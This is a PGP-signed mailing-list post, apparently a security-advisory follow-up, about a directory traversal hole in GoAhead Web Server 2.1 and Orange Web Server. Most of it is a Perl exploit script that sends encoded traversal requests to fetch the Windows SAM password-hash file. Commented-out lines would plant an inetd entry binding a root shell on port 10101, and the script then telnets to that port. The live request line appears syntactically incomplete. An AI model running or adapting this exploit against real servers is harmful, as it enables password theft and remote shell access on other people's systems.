-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Have been aware for some time and I Just wanted to add a little to
Mr. Moore's observations ;
Title: GoAhead Web Server Directory Traversal + Cross Site Scripting
>Also Effected: Orange Web Server -all versions
Risk Rating: Medium
>escalated to risk: high - password hash pilfer via 300 year old
>traversal technique
Software: GoAhead Web Server v2.1
<added Orange Web Server - All
<Orange Web Server uses GoAhead WebServer 2.1 technology so it is
<powerful and stable. - nuff said
Platforms: Windows NT/98/95/CE
Embedded Linux
Linux
QNX
Novell Netware + others
<ADDED: Hard Hat Linux - started
<bundling GoAhead with thier distros, so there should be palm
<pilots, cellphones and all kinds of nifty prototype devices
<running this sad-ware
#!/usr/bin/perl
# spawns a shell on port 10101
use IO::Socket;
if (@ARGV < 1) { print "usage: perl go-orange.pl [host]\n"; exit; }
$host = $ARGV[0];
$shell = IO::Socket::INET->new( PeerAddr=>"$host",
PeerPort=>"80",
Proto=>"tcp") || die "Connection failed.\n";
#dump sam is success on Orange and GoAhead!- was able to jump around
#and do interesting things with encoding 0-day
#%77innt/s%79s%74em%332/%63%6D%64.%65x%65?/c%25%32%30ech%6F%%320W%65
print $shell "GET /..%5C..%5C..%5C..%5C..%5C..%5C/winnt/repair/sam
##################################################################
#commented out hypothetical embedded webserver in transmeta-maytag
#stove scenario. Will leave hand held device ( game boy) format vuln
#testing to experts at Non-profit .org's
# Only testbeds I saw were win32 ( I only looked for 10 #minutes)
#print $shell "GET
#/..%5C..%5C..%5C..%5C..%5C..%5C/bin/echo%20\"10101%20stream%20tcp%2
#0nowait%20root%20/bin/sh%20-i\"%20>>%20/tmp/inet|
#HTTP/1.0\n\n";
# we get signal again
#$shell = IO::Socket::INET->new( PeerAddr=>"$host",
#PeerPort=>"80",
#Proto=>"tcp") || die "fuq, we no get signal.\n";
#print $shell "GET
#/..%5C..%5C..%5C..%5C..%5C..%5C/usr/sbin/inetd%20/tmp/inet|
#HTTP/1.0\n\n";
sleep 1;
print "handheld haqrz connect to $host on port 10101...";
system("telnet $host 10101");
- - xile
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com
wlkEARECABkFAj01ioASHHhpbGVAaHVzaG1haWwuY29tAAoJEBnsRZrmhGsJapUAnRCE
Mg4OfVISUBrPgWxFcbW2mK6XAJ4/xxmJInaJRv/YqC45ki6wYPOPbA==
=IKhW
-----END PGP SIGNATURE-----
Communicate in total privacy.
Get your free encrypted email at https://www.hushmail.com/?l=2
Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
